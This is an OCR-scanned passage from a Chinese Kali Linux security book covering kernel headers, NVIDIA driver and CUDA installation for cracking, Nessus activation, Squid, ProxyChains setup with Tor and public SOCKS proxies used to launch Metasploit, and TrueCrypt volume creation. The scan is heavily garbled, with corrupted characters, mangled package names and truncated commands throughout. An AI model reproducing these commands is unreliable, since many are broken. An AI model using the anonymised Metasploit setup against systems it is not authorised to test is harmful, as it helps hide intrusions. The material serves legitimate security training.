络 Test1， 单 击 Test1 的 “属性 ?按钮 ， 将 显示 如 图 1.64 所 示 的 界面 。 


Testi - 属性 
O 使 用 静态 IP 


| | AHA DNS 


E 

O 所 有 共享 该 essid 的 网 络 均 使 用 该 设置 
v 使 用 加 密 

WEP (Passphrase) 





Passphrase 


脚本 | 信息 (1) 


| 取消 (Cc) || 确定 (0) 


1.64 属性 设置 

(3) 在 该 界面 选择 “使 用 加 密 " 复 选 框 ， 然 后 选择 加 密 方式 并 输入 密码 。 如 果 不 想 显 
示 密 码 字 符 时 ， 不 要 勾 选 密码 文本 框 前 面 的 复 选 框 。 设 置 完 后 ， 单 击 “ 人 确定 ”按钮 ， 
料 返 回 到 图 1.63 界 面 。 此 时 在 该 界面 单 击 “连接 按钮， 就 可 以 连接 到 Test1 网 络 。 


H2% ”配置 Kali Linux 


E— 381128 f Kali Linux 的 概念 及 安 疼 。 本 重 将 介绍 Kali 的 配置 ， 以 便于 用 户 能 充分 
利用 它 。 本章 主要 介绍 如 何 配 置 内 核 关 文件、 配置 额外 安全 工具 和 设置 
ProxyChains 等 。 本 章 主 要 知识 点 如 下 : 


准 各 内核 头 文件 ; 
应 用 更 新 并 配置 额外 的 安全 工具 ; 
设置 ProxyChains ; 


目录 加 密 。 


2.1 准备 内 梳头 文件 


内 核 头 文件 是 Linux 内 核 的 源 代码 。 有 时 候 ， 用 户 需 要 编译 内 核 头 文件 代码 ， 为 以 后 
使 用 内 核 头 文件 做 准备 ， 本 节 将 介绍 编译 内 核 头 文件 的 详细 步骤 。 


准备 内核 头 文件 的 具体 操作 步骤 如 下 所 示 。 
(1) 更 新 软件 包 列 表 。 执 行 合 分 如 下 所 示 : 


root@Kali:~# apt-get update 


俞 出 结果 如 下 所 示 : 


Binary 20130905-08:50] kali/non-free Translation-en 


获取 : 
获取 : 


命中 


获取 : 


1 http://mirrors.neusoft.edu.cn kali Release.gpg [836 B] 

2 http://mirrors.neusoft.edu.cn kali/updates Release.gpg [836 
http://mirrors.neusoft.edu.cn kali Release 

3 http://mirrors.neusoft.edu.cn kali/updates Release [11.0 kB 
http://mirrors.neusoft.edu.cn kali/main 1386 Packages 
http://mirrors.neusoft.edu.cn kali/non-free 1386 Packages 
http://mirrors.neusoft.edu.cn kali/contrib 1386 Packages 


: 4 http://security.kali.org kali/updates Release.gpg [836 B] 


:5 http://mirrors.neusoft.edu.cn kali/updates/main 1386 Package 
:6 http://http.kali.org kali Release.gpg [836 B] 


http://mirrors.neusoft.edu.cn kali/updates/contrib 1386 Packag 
http://http.kali.org kali Release 
http://mirrors.neusoft.edu.cn kali/updates/non-free 1386 Packa 


:7 http://security.kali.org kali/updates Release [11.0 kB] 


http://http.kali.org kali/main Sources 


: 8 http://security.kali.org kali/updates/main 1386 Packages [2( 


http://mirrors.neusoft.edu.cn kali/contrib Translation-zh CN 
http://mirrors.neusoft.edu.cn kali/contrib Translation-zh 





输出 的 信息 是 在 更 新 软件 源 中 yia bei 此 过 程 中 需要 等 待 一 段 时 间 ， 
RR IE. 更 新 的 速度 会 快 一 点 。 骗 幅 的 原因 ， 这 里 只 列 出 了 一 少 部 分 
的 输 出 信息 /ENo 


(2) 使 用 apt-get 命 全 准备 内 核 头 文件 。 执 行 信 分 如 下 所 示 : 


root@Kali:~# apt-get install linux-headers- “uname -r` 
正在 读 取 软 件 包 列 表 . 完成 
正在 分 析 软 件 包 的 依赖 天 系 树 
正在 读 取 状态 信息 .. 完成 
Package "linux-headers' is not installed, so not removed 
根据 正则 表达 式 3.12-kalii-686-pae 选中 了 nvidia-kernel-3.12-kalii 
根据 正则 表达 式 3.12-kali1-686-pae 选中 了 linux-image-3.12-kalii-€ 
根据 正则 表达 式 3.12-kali1-686-pae 选中 了 linux-image-3.12-kalii-€ 
根据 正则 表达 式 3.12-kalii-686-pae 选中 了 linux-modules-3.12-kali1 
根据 正则 表达 式 3.12-kalii-686-pae 选中 了 linux-latest-modules-3.1 
根据 正则 表达 式 3.12-kalii-686-pae 选中 了 linux-headers-3.12-kali1 
选取 linux-image-3.12-kalii-686-pae 而 非 linux-modules-3.12-kal 
选取 linux-image-686-pae 而 非 linux-latest-modules-3.12-kali1-€ 
linux-image-3.12-kalii1-686-pae 已 经 是 最 新 的 版 本 了 。 
linux-image-3.12-kali1-686-pae 被 设置 为 手动 安装 。 
linux-image-686-pae 已 经 是 最 新 的 版 本 了 。 
下 列 软 件 包 是 目 动 安 效 的 并 且 现 在 不 需要 了 : 
libmozjs22d libnfc3 libruby libwireshark2 libwiretap2 libwsutil2 
ruby-crack ruby-diff-lcs ruby-rspec ruby-rspec-core ruby-rspec- 
expectations 
PUBS repe - ees ruby-simplecov ruby-simplecov-html xulrunner-22 
Use 'apt-get autoremove' to remove them. 
将 会 安 闻 下列 额 外 的 软件 包 : 
glx-alternative-mesa glx-alternative-nvidia glx-diversions 
linux-headers-3.12-kalii-common linux-kbuild-3.12 nvidia-alternat 
nvidia-installer-cleanup nvidia-kernel-common 
建议 安 妆 的 软件 包 : 
nvidia-driver 
下 列 【新 】 FRAP CURR ECR : 
glx-alternative-mesa glx-alternative-nvidia glx-diversions 
linux-headers-3.12-kali1-686-pae linux-headers-3.12-kalii-common 
linux-image-3.12-kali1-686-pae-dbg linux-kbuild-3.12 nvidia-altei 
nvidia-installer-cleanup nvidia-kernel-3.12-kalii1-686-pae 
nvidia-kernel-common 
升级 了 0 PAS, MARRS 11 PRAS, BHR 0 个 软件 包 ， 有 5 个 软件 包 示 被 
需要 下 载 361 MB 的 软件 包 。 
解压 缩 后 会 消耗 掉 1,812 MB 的 额外 空间 。 
您 希望 继续 执行 吗 ? [Y/n]y 


al al a a a 


| OK GU CUR COR cok CUR CUM 


NOP NII NII NIS NIS NII NIS NI? 
HH” / , / / / / Hr 





俞 出 的 信息 显示 T linux- jr rete e Ed. 提示 将 会 安装 哪些 软件 包 
及 软件 包 的 大 小 等 信息 。 此 时 输 y, 继续 eo ur n 退出 程序 。 


(3) 复制 generated 下 的 所 有 内 容 。 执 行 命 爷 如 下 所 示 : 


root@Kali:~# cd /usr/src/linux-headers-3.12-kalii-686-pae/ 
root@Kali:/usr/src/linux-headers-3.12-kali1-686-pae# cp -rf include 


(4) 编译 内 核 头 文件 代码 。 
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2 Z% GC IS NVIDIA X ^ 3i z/ 


Y RIRXERBEGAIERIE4R AR E FE, CEMA SES. RATER EU 
到 操作 条 统 中 的 一 小 块 代码 ， 其 中 包含 有 关 硬件 设 各 的 信息 。 有 了 此 信息 ， 计 算 机 
融 可 以 与 设备 进行 通信 。 驱 动 程序 是 硬件 广 丙 根据 操作 系统 编写 的 配置 文件 ， 可 以 
说 没有 驱动 程序 ， 计 算 机 中 的 硬件 融 无 法 工作 。 操 作 系 统 不 同 ， 硬 件 的 驱动 程序 也 
不 同 。 本 节 将 介绍 在 Kali 中 安装 NVIDIA 显 卡 驱 动 的 方法 。 


安装 NVIDIA 显 卡 驱 动 的 具体 操作 步骤 如 下 所 示 。 
(1) 将 开源 的 NVIDIA 驱 动 nouveau 加 入 黑 名 单 。 方 法 如 下 所 示 : 


root@kali:~# vi /etc/modprobe.d/blacklist.conf 
blacklist nouveau 


以 上 信息 表示 在 blacklist.conf 文 件 中 添加 了 blacklist nouveau 一 行内 容 。 
(2) 查看 当前 的 系统 信息 。 执 行 命 全 如 下 所 示 : 


root@kali:~# uname -a 
Linux kali 3.12-kalii-kali-amd64 #1 SMP Debian 3.12.6-2kali1 (2014. 


- 


从 输出 的 信息 中 可 以 看 到 当前 系统 安装 的 是 Kali， 其 内 核 版 本 为 3.12， 系 统 架 构 是 
x86 64 位 。 


(3) BeeLinux kM WTA RATT : 





root@kali:~# aptitude -r install linux-headers-$(uname -r) 

FIIRT” BRE LTA £2 
linux-headers-3.12-kalii-686-pae linux-headers-3.12-kalii1-common: 
linux-kbuild-3.12{a} 

BERL A HIER” : 
firmware-mod-kit{u} libadnsi[u) libcrypto++9{u} liblzma-dev{u} 
libsmi2-common{u} libwebkit-dev{u} msgpack-python{u} p7zip{u} 
python-adns{u} python-bs4{u} python-easygui{u} python-ipy{u} 
python-levenshtein{u} python-mechanize{u} python-metaconfig{u} 
python-paramiko{u} python-pycryptopp{u} python-pysnmp4{u} 
python-pysnmp4-apps{u} python-pysnmp4-mibs{u} sqlmap{u} unrar-fre 
9 个 软件 包 被 升级 ， 新 安装 3 个 ，22 个 将 被 删除 ， 同时 206 个 将 不 升级 。 

BERR 4,848 kB 的 存档 。 解 包 后 将 释放 55.4 MB. 

您 要 继续 吗 ? [Y/n] y 


fg reAxÁXÍaÍtetrLrüLLLL LLLA A ALL Um 


DAE si EE I Eo I SU SRA PRL, TEAR MPRA PAT ABS Ec PE CI 
Fo Ube Ay, skye RRR. 





(4) 安 丢 NVIDIA 内 核 。 执 行 合 分 如 下 所 示 : 


root@kali:~# apt-get install nvidia-kernel-3.12-kaliit-adm64 


执行 以 上 命令 后 ， ie 3€envidia-kernel B AY seit fg, LEN RSS Fae 
何 信息 ， 和 料 目 动 安装 完成 


(5) 安装 NVIDIA 了 驱动 nvidia-kernel-dkms 包 。 执 行 命 全 如 下 所 示 : 


root@kali:~# aptitude install nvidia-kernel-dkms 

下 列 “ 新 "软件 色 将 被 安 疼 。 
dkms{a} glx-alternative-mesa[a) glx-alternative-nvidia{a} 
glx-diversions{a} libgli-nvidia-glx{a} libvdpaui{fa} 
linux-headers-3.12-kali1-686-pae{a} linux-headers-3.12-kalii1-comr 
linux-headers-686-pae{a} linux-kbuild-3.12{a} nvidia-alternative: 
nvidia-driver{a} nvidia-installer-cleanup{a} nvidia-kernel-commor 
nvidia-kernel-dkms nvidia-vdpau-driver{a} xserver -xorg-video-nvit 
9 个 软件 包 被 升级 ， 新 安装 17 A 0 个 将 被 删除 ， 同时 207 个 将 不 升级 。 

REAR 29.4 MB 的 存档 。 解 包 后 SEH 108 MB, 
您 要 继续 吗 ? [Y/n] y 


e 





以 上 输出 信息 显示 了 将 安装 的 软件 包 及 软件 包 的 大 小 。 此 时 输入 y， 继 续 安 装 。 在 
安装 过 程 中 ， 会 出 现 如 图 2.1 所 示 的 界面 。 


| Configuring xserver-xorg-video-nvidia | 


Manual configuration required to enable NVIDIA driver 


The NVIDIA driver is not yet configured; it needs to be enabled in 
xorg.conf before it can be used. 


Please see the package documentation for instructions. 





图 2.1 fc xserver-xorg 


该 界面 提示 需要 配置 Xserver-xorg-video-nvidia。 在 该 界面 单 击 OK 按钮 ， 后 面 手 动 
进行 配置 。 
(6) 安装 NVIDIA 显 卡 驱 动 应 用 程序 nvidia-xconfig 包 。 执行 命令 如 下 所 示 : 


root@kali:~# aptitude install nvidia-xconfig 


(7) 生成 Xorg 服 务 配置 文件 。 执 行 命 分 如 下 所 示 : 


root@kali:~# nvidia-xconfig 


HiT AL ela, Haan RAPA e 


WARNING: Unable to locate/open X configuration file. 
New X configuration file written to '/etc/X11/xorg.conf' 


输出 的 信息 ， 表 示 重 新 生成 了 xorg.conf 文 件 。 然 后 ， 重 新 启动 系统 。 


(8) 检查 NVIDIA 显 卡 驱动 是 否 成 功 安 锋 。 首 先 检 查 GLX 模 块 ， 执 行 命 合 如 下 所 
7N : 


root@kali:~# glxinfo | grep -i "direct rendering" 
direct rendering: Yes 


检查 NVIDIA 驱 动 模 块 。 执 行 命令 如 下 所 示 : 


root@kali:~# lsmod | grep nvidia 

nvidia 9442880 29 

12c_core 24129 2 12c_1801,nvidia 
root@kali:~# lsmod | grep nouveau 


通过 查看 以 下 文件 的 内 容 ， 确 定 开 源 的 NVIDIA 驱 动 nouveau 是 否 被 加 入 黑 名 单 ， 如 
下 所 示 : 


root@kali:~# cat /etc/modprobe.d/nvidia.conf 

alias nvidia nvidia-current 

remove nvidia-current rmmod nvidia 

root@kali:~# cat /etc/modprobe.d/nvidia-blacklists-nouveau.conf 
# You need to run "update-initramfs -u" after editing this file. 
# see #580894 

blacklist nouveau 

root@kali:~# cat /etc/modprobe.d/nvidia-kernel-common.conf 
alias char-major-195* nvidia 


options nvidia NVreg_DeviceFileUID=0 NVreg DeviceFileGID-44 NVreg I 
# To enable FastWrites and Sidebus addressing, uncomment these line 
# options nvidia NVreg EnableAGPSBA-1 
4 options nvidia NVreg EnableAGPFW-1 


BE xl 
看 到 以 上 输出 信息 ， 就 表示 nouveau 已 被 加 入 黑 名 单 。 





为 了 加 快 用 户 破 解 一 些 大 数据 文件 ， 需 要 安 疙 CUDA (Compute Unified Device 
Architecture) 。CUDA 是 一 种 由 NVIDIA 推 出 的 通用 并 行 计算 架构 ， 该 架构 使 GPU 
能 够 解决 复 条 的 计算 问题 。 


安装 NVIDIA CUDA 工 具 集 和 NVIDIA openCL。 执 行 命 合 如 下 所 示 : 
root@kali:~# aptitude install nvidia-cuda-toolkit nvidia-opencl-ict 
本: 


执行 以 上 命 全 后 ， 如 果 输 出 过 程 中 没有 出 错 的 话 ， 表 示 该 软件 乌 安 流 成 功 。 以 后 融 
可 以 使 用 CUDA 和 破解 加 密 的 大 数据 文件 。 


2.3 应 用 更 新 和 配置 额外 安全 工具 


本 节 将 介绍 更 新 Kali 的 过 程 和 配置 一 些 额外 的 工具 。 这 些 工 具 在 后 面 的 章节 中 将 是 
有 用 的 。Kali 软 件 包 不 断 地 更 新 和 发 布 之 间 ， 用 户 很 快 发 现 一 套 新 的 工具 比 最 初 在 
DVD ROM 上 下 载 的 软件 包 更 有 用 。 本 节 将 通过 更 新 安 于 的 方法 ， 获 取 Nessus 的 一 
个 激活 码 。 最 后 安装 Squid。 

应 用 更 新 和 配置 额外 安全 工具 的 具体 操作 步骤 如 下 所 示 。 


(1) BAMA OUR. AT RAM : 


root@Kali:~# apt-get update 


执行 以 上 命 分 后 ， 需 要 等 待 一 段 时 间 。 执 行 完 后 ， 会 目 动 退出 程序 。 
(2) 升级 已 存在 的 瑟 。 执 行 合 分 如 下 所 示 : 


root@Kali:~# apt-get upgrade 


(3) 升级 到 最 新 版 本 。 执 行 合 分 如 下 所 示 : 


root@Kali:~# apt-get dist-upgrade 


(4) Mhttp://www.nessus.org/products/nessus/nessus-plugins/obtain-an- 
activation-code 官 网 获取 一 个 激活 码 。 在 浏览 器 中 输入 该 地 址 后 ， 将 显示 如 图 2.2 所 
示 的 界面 。 
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Using Nessus at 


Using Nessus at 1 
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Work? 
A Nessus* subscription is Nessus Home is free for 
required for all uses of Nessus outside non-commercial, home use only 


of the home 





图 2.2 获取 激活 码 


在 该 界面 选择 免费 版 Using Nessus at Home ?选项 ， 单 击 Select 按 钮 ， 将 显示 如 
2.3 所 示 的 界面 。 
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Register for an 
Activation Code 
‘enable Nessus® Home allows you to scan your personal home 
petwork (up to 16 IP addresses per scanner) with the same high- First Name * 
peed, in-depth assessments and agentless scanning 
Lonvenience that Nessus subscribers enjoy 


lease note that Nessus Home does not provide access to 
support, allow you to perform compliance checks or content 

| udits, or allow you to use the Nessus virtual appliance. If you 
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lessus subscription 


[China 


nvironment only. It is not for use by any commercial V Check to receive updates 


essus Home is available for personal use in a home 


organization. from Tenable 
hl i agree to the terms of 
ence 








EJ 2.3 注册 信息 


Tma, NES, €dRegisterf£iz, EEA a eK 
到 一 份 邮 件 。 进 入 邮箱 后 ， 可 看 到 该 邮件 中 有 一 个 激活 码 。 


(5) 为 Nessus 网 络 接口 创建 一 个 用 户 账 户 。 执 行 命 分 如 下 所 示 : 
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root@Kali:~# /opt/nessus/sbin/nessus-adduser 


Login :admin # 输 入 用 户 名 为 admin 
Login pasword : # 输 入 用 户 密码 

Login password (again) : Hia AGAS S 

Do you want this user to be a Nessus 'admin' user ? (can upload pli 
User rules #A 户 规则 


nessusd has a rules system which allows you to restrict the hosts 
that admin has the right to test. For instance, you may want 

him to be able to scan his own host only. 

Please see the nessus-adduser manual for the rules syntax 

Enter the rules for this user, and enter a BLANK LINE once "in are 


(the user can have an empty rules set) # 按 下 空格 键 提交 输 
Login : admin 
Password : KKEKKKKKKKKK 


This user will MENTE ‘admin' privileges within the Nessus server 
Rules 

Is that ok ? (y/n) [y] y 

User added # 用 户 被 添加 





M 出 的 信息 中 可 以 看 到 admin 用 户 彼 添加 成 功 了 。 
(6) 激活 Nessus。 执 行 合 分 如 下 所 示 : 


root@Kali:~# /opt/nessus/bin/nessus-fetch --register XXXX-XXXX- XxX) 
a] | 


以 上 命令 中 的 XXXX-XXXX-XXXX-XXXX-XXXX 指 的 是 在 邮件 中 获取 到 的 激活 码 。 
执行 以 上 命 全 后 ， 输 出 信 E FB: . 





Your Activation Code has been registered properly - thank you. 


Now fetching the newest plugin set from plugins.nessus.org HS 
Could not verify the signature of all-2.0.tar.gz # 不 能 证 实 all 


(7) 和 启动 Nessus 服 务 。 执 行 命令 如 下 所 示 : 





root@Kali:~# /etc/init.d/nessusd start 


在 第 (6) 步骤 中 激活 Nessus 时 ， 输 出 和 以 上 相同 的 信息 ， 表示 没有 激活 Nessus。 
这 个 问题 在 RHEL 上 不 会 出 现 的 。 不 过 ， 这 里 有 方法 来 解决 这 个 问题 。 具 体操 作 步 
又 如 下 所 示 。 


(1) 删除 文件 nessus-fetch.rc。 执 行 命 人 如 下 所 示 : 


root@Kali:~# rm /opt/nessus/etc/nessus/nessus-fetch.rc 


(2) 使 用 nessus-fetch --challenge 获 取 挑 战 码 。 执 行 命 分 如 下 所 示 : 


root@Kali:~# /opt/nessus/bin/nessus-fetch --challenge 
Challenge code: XXXXXXXXXXXXXXXXXXXXXXXX 


You can copy the challenge code above and paste it alongside your 
Activation Code at: 
https://plugins.nessus.org/offline.php 


ey M 
其 中 ，xxxxxxxxxxxxxxxxxxxxxxxx 是 输出 的 挑战 码 。 


(3) 重新 登录 http://www.nessus.org/products/nessus/nessus-plugins/obtain-an- 
activation- code 网 站 获取 激活 码 。 


(4) 登录 https://plugins.nessus.org/offline.php 网 站 ， 在 该 界面 输入 生成 的 挑战 码 
和 激活 码 ， 如 图 2.4 所 示 的 界面 。 


Tenable Network Security = Iceweasel "NE, 
File Edit View History Bookmarks Tools Help 
| O Tenable Network Security | | 
Ge (à vorne nesaus rg'ffne ph "eB 3 9 * 


B Most Visited’ BOffensive Security “A Kali Linux “Kali Docs KlExploit-DB W Aircrack-ng 





tenable .... 


network security 





Type 'nessus-fetch --challenge' on your nessusd server and type in the result 


Da3ngscpac7BGSB7SOCOUUIO7 BG TBB7ETISHBU!! 


Enter your activation code 











图 2.4 获取 插件 
此 时 单 击 Submit 按 钮 ， 将 显示 如 图 2.5 所 示 的 界面 。 


Tenable Network Security = lceweasel 
File Edit View History Bookmarks Tools Help 
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Thank you. You can now obtain the newest Nessus plugins at 
http//plugins.nessus.org/get php"?Izall-2.0.tar.gz&u2c725ab5a84Be49bBa564c5b7933540818 
pzeb02c798d67[19859d891127b74dc5d1f0 


You also need to copy the following file to : 





+ lopt/nessus/etc/nessus/nessus-fetch.rc (Unix) 

+ C:\Documents and Settings\All Users Application Data\Tenable\Nessusiconfinessus- 
fetch.rc (Windows XP/2K3) 

s C:\ProgramData\Tenable\Nessusiconfinessus-fetch.rc (Windows Vista/7/8/2008/2012) 

* /Library/Nessus/run/etc/nessus/nessus-fetch.rc (Mac OS X) 

+ /usr/localinessus/etc/nessus/nessus-fetch.rc (FreeBSD) 











nessus-rercn.rec 


am 


图 2.5 下 载 插件 

从 该 界面 下 载 nessus-fetch.rc 和 all-2.0.targz， 将 其 下 载 到 本 地 。 

(5) 将 下 载 到 的 nessus-fetch.rc 文 件 复 制 到 /opt/nessus/etc/nessus/ 目 录 下 。 执 行 
命令 如 下 所 示 : 


root@Kali:~# cp /root/nessus-fetch.rc /opt/nessus/etc/nessus 


执行 以 上 命令 后 ， 没 有 任何 输出 信息 。 
(6) 使 用 nessus-update-plugins 命 令 将 Nessus 的 插件 all-2.0.tar.gz 加 载 。 执行 命 兮 
如 下 所 示 : 


root@Kali:~# /opt/nessus/sbin/nessus-update-plugins /root/all/all-: 
Expanding /root/all/all-2.0.tar.ggz.. 
Done. The Nessus server will start processing these plugins within 


(7) 重新 启动 Nessus 服 务 。 执 行 命 全 如 下 所 示 : 








root@Kali:~# /etc/init.d/nessusd restart 
$Shutting down Nessus 
$Starting Nessus 


以 上 步骤 操作 完成 后 ，Nessus 就 被 激活 了 。 如 果 不 激活 Nessus， 
的 。 
在 Kali 中 安 委 Squid 服 务 。 tT oe DA RATA : 


root@Kali:~# apt-get install squid3 


设置 Squid 服 务 开机 不 自动 启动 。 执 行 命令 如 下 所 示 : 


root@Kali:~# update-rc.d -f squid3 remove 


2.4 设置 ProxyChains 


ProxyChains 是 Linux 和 其 他 Unices 下 的 代理 工具 。 它 可 以 使 任何 程序 通过 代理 上 
网 ， 人 允许 TCP 和 DNS 通 过 代理 隧道 ， 支 持 HTTP、SOCKS4 和 SOCKS5 类 型 的 代理 
服务 器 ， 并 且 可 配置 多 个 代理 。 Ae ga m 
搂 指 定 的 应 用 程序 ， 下 搂 断 开 搂 收 方 和 发 送 方 的 连接 。 本 节 将 介绍 设置 
ProxyChains 的 方法 。 


设置 ProxyChains 的 具体 操作 步骤 如 下 所 示 。 
(1) 打开 ProxyChains 配 置 文件 。 执 行 命令 如 下 所 示 : 


root@Kali:~# vi /etc/proxychains.conf 


执行 以 上 命 分 后 ， 打 开 文 件 的 内 容 如 下 所 示 : 


proxychains.conf VER 3.1 
HTTP, SOCKS4, SOCKS5 tunneling proxifier with DNS. 


The option below identifies how the ProxyList is treated. 
only one option should be uncommented at time, 
otherwise the last appearing option will be accepted 


dynamic_chain 


Dynamic - Each connection will be done via chained proxies 
all proxies chained in the order as they appear in the list 
at least one proxy must be online to play in chain 

(dead proxies are skipped) 

otherwise EINTR is returned to the app 


trict_chain 

Strict - Each connection will be done via chained proxies 
all proxies chained in the order as they appear in the list 
all proxies must be online to play in chain 

otherwise EINTR is returned to the app 


random chain 


dk xb dk db db db db db O0) dk Gk dt db Gb dt dk db dt dk Gb db Gb Gb db Gt 


4 Random - Each connection will be done via random proxy 
4 (or proxy chain, see chain len) from the list. 
4 this option is good to test your IDS :) 


傅 出 的 信息 融 是 proxychains.conf 文 件 的 内 容 。 由 于 篇 幅 的 原因 ， 这 里 只 列 出 了 部 
分 内 容 。 


(2) 将 proxychains.conf 文 件 中 的 dynamic_chain 前 面 的 注释 符 取 消 。 要 修改 的 配 
置 项 ， 是 上 面 加 粗 的 部 分 ， 如 下 所 示 : 


dynamic_chain 


(3) 添加 一 些 代理 服务 器 到 列表 (proxychains.conf 文 件 末尾 ) ， 如 下 所 示 : 


ProxyList format 
type host port [user pass] 
(values separated by 'tab' or ‘blank’ ) 


Examples: 


# 
# 
# 
# 
# 
# 
# 
# socks5 192.168.67.78 1080 lamer secret 
H http 192.168.89.3 8080 justu hidden 
# socks4 192.168.1.49 1080 
H http 192.168.39.93 8080 
# 
# 
# 
# 
# 


proxy types: http, socks4, socks5 
( auth types supported: "basic"-http "user/pass"-socks ) 


[ProxyList | 

# add proxy here ... 

# meanwile 

# defaults set to "tor" 

socks4 127.0.0.1 9050 

socks5 98.206.2.3 1893 

socks5 76.22.86.170 1658 
RUE 


| 
以 上 信息 中 加 粗 的 部 分 为 添加 的 代理 服务 器 。 
(4) 通过 用 户 的 连接 代理 解析 目标 主机 。 执 行 命 令 如 下 所 示 : 


root@kali:~# proxyresolv www.target.com 


默认 情况 下 ， 执 行 proxyresolv 命 仿 ， 可 能 看 到 该 命令 没 找到 错误 信息 。 AA 
proxyresolv 保 存在 /usr/lib/proxychains3/ 目 录 中 ， 而 不 和 ERAT proxyresolv tli 
proxychains 调 用 ， 所 以 将 这 两 个 文件 放 在 一 个 目录 中 ， 如 /usr/bin。 执 行 命 爷 如 下 
ATA : 


root@kali:~# cp /usr/lib/proxychains3/proxyresolv /usr/bin/ 


执行 完 以 上 命令 后 ，proxyresolv 命 令 就 可 以 执行 了 。 


(5) 通过 用 户 想 要 使 用 的 应 用 程序 运行 ProxyChains， 人 例如， 和 启动 msfconsole。 执 
行 命令 如 下 所 示 : 


root@kali:~# proxychains msfconsole 
ProxyChains-3.1 (http://proxychains.sf.net) 
|DNS-request| 0.0.0.0 

|S-chain| -<>-127.0.0.1:9050-<--timeout 
|DNS-response|: 0.0.0.0 is not exist 


Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro 
-- type 'go pro' to launch it now. 


-[ metasploit v4.7.0-2013082802 [core:4.7 api:1.0] 


+ -- --=[ 1161 exploits - 641 auxiliary - 180 post 
+ -- --=[ 310 payloads - 30 encoders - 8 nops 
msf > 


执行 以 上 命令 后 ， 看 到 msf> 提 示 符 表示 msfconsole 和 启动 成 功 了 。 表 示 ProxyChains 
设置 成 功 。 


2.5 目录 加 密 

在 Kali 中 提供 了 一 个 目录 加 密 工 具 TrueCrypt。 该 工具 是 一 款 开源 的 绿色 加 密 谷 加 窗 
软件 ， 不 需要 生成 任何 文件 即 可 在 硬 间 上 建立 虚拟 磁盘。 用 户 可 以 按照 盘 符 进行 访 
间 ， 所 以 虚拟 硫 盘 上 的 文件 都 被 目 动 加 密 ， 访 问 时 需要 使 用 密码 解密 。TrueCrypt 
提供 多 种 加 密 算 法 ， 包 括 AES、Serpent、Twofish、AES-Twofish 和 AES-Twofish- 
Serpent 等 。 本 节 将 介绍 TrueCrypt 工 具 的 使 用 。 


2.5.1 创建 加 密 目 录 


使 用 TrueCrypt 工 具 加 密 目 录 。 具 体操 作 步 骤 如 下 所 示 。 
(1) 启动 TrueCrypt 工 具 。 在 终 痛 执行 如 下 所 示 的 命令 : 


root@kali:~# truecrypt 


执行 以 上 命令 后 ， 将 显示 如 图 2.6 所 示 的 界面 。 
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TrueCrypt 
| Volumes Favorites Tools Settings Help k 








Wipe Cache 








Dismount All — | | 











E 2.6 TrueCrypt 初 始 界面 
(2) 在 该 界面 单 击 Create Volume 搜 钮 ， 将 显示 如 图 2.7 所 示 的 界面 。 
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TrueCrypt Volume Creation Wizard k 
TrueCrypt Volume Creation Wizard 


* Create an encrypted file container 


Creates a virtual encrypted disk within a file. 
Recommended for inexperienced users. 


More information 


L2 Create a volume within a partition/drive 


Formats and encrypts a non-system partition, entire 
external or secondary drive, entire USB stick, etc. 








MRIH) Next> | | 取消 (C) 





























图 2.7 TrueCrypt Volume Creation Wizard 


(3) 在 该 界面 选择 创建 党 容 器 ， 这 里 选择 默认 的 Create an encrypted file 
container 选 项 ， 单 击 Next 按 钮 ， 将 显示 如 图 2.8 所 示 的 界面 。 








TrueCrypt Volume Creation Wizard k Lm L^ 


Volume Type 


* Standard TrueCrypt volume 


Select this option if you want to create a normal 
TrueCrypt volume. 


Hidden TrueCrypt volume 


It may happen that you are forced by somebody to 
reveal the password to an encrypted volume. There are 
many situations where you cannot refuse to reveal the 
password (for example, due to extortion). Using a 
so-called hidden volume allows you to solve such 
situations without revealing the password to your 


volume. 


More information about hidden volumes 





RRHH) < Prev | Next> | HGA (C) 















































图 2.8 Volume Type 


(4) FREAK, m EAA Standard TrueCrypt volume, * #Next 
按钮 ， 将 显示 如 图 2.9 所 示 的 界面 。 





口 
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TrueCrypt Volume Creation Wizard k — X 


Volume Location 


| 
| “| [Select File... 


vi Never save history 


A TrueCrypt volume can reside in a file (called TrueCrypt 
container), which can reside on a hard disk, on a USB flash 
drive, etc. A TrueCrypt container is just like amy normal file 
(it can be, for example, moved or deleted as any normal 
file). Click “Select File’ to choose a filename for the 
container and to select the Location where you wish the 
container to be created. 


WARNING: If you select an existing file, TrueCrypt will 
NOT encrypt it; the file will be deleted and replaced with 
the newly created TrueCrypt container. You will be able 
to encrypt existing files (Later on) by moving them to the 
TrueCrypt container that you are about to create now. 





MENIH) < Prev N 取消 (Cc) | 


图 2.9 Volume Location 


(5) 在 该 界面 单 击 Select File... 按 钮 ， 将 显示 如 图 2.10 所 示 的 界面 。 

















Specify a New TrueCrypt Volume k 
名 称 (N) : | CryptVolume| E 
REFXRF: |< [root 创建 文件 夹 () 
位 置 (R) | 名称 v 大 小 “修改 日 期 m 
q 搜索 I Desktop 2014 年 03 月 14 日 
eminem] [S fbterm-1.7.0.tar.gz 9.6 KB 星期 一 

iz wlan-Ol.ivs 434 字 节 星期 四 


All Files 

















取消 (c) | | 保存 (5) | 


2.10 指定 一 个 新 TrueCrypt 疮 


(6) 在 该 界面 为 新 耸 指 定 一 个 名 称 和 位 置 ， 这 里 创建 的 知名 称 为 CryptVolume， 保 
存在 /root 目 录 下 。 然 后 单 击 “保存 按钮， 将 显示 如 图 2.11 所 示 的 界面 。 
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TrueCrypt Volume Creation Wizard k = | A 


Volume Location 





F 


| Select File... | 


[iroot CryptVolume 






































M Never save history 


A TrueCrypt volume can reside in a file (called TrueCrypt 
container), which can reside on a hard disk, on a USB flash 
drive, etc. A TrueCrypt container is just like amy normal file 
(it can be, for example, moved or deleted as any normal 
file). Click “Select File to choose a filename for the 
container and to select the location where you wish the 
container to be created. 


WARNING: If you select an existing file, TrueCrypt will 
NOT encrypt it; the file will be deleted and replaced with 
the newly created TrueCrypt container. You will be able 
to encrypt existing files (Later on) by moving them to the 
TrueCrypt container that you are about to create now. 





MIRNIH) < Prev Next > BBC) 


图 2.11 Volume Location 


(7) 在 该 界面 可 以 看 到 前 面 创建 的 耸 的 名 称 和 位 置 。 然 后 单 击 Next 按 钮 ， 
如 图 2.12 所 示 的 界面 。 


TrueCrypt Volume Creation Wizard = | A 
k 
Encryption Options 


Encryption Algorithm 


| AES E Test 


FIPS-approved cipher (Rijndael, published in 1998) that 
may be used by U.S. government departments and 
agencies to protect classified information up to the Top 
Secret level. 256-bit key, 128-bit block, 14 rounds 
(AES-256). Mode of operation is XTS. 


Mare information on AES 











Benchmark 
Hash Algorithm 
RIPEMD-160 ~ | Information on hash algorithms 
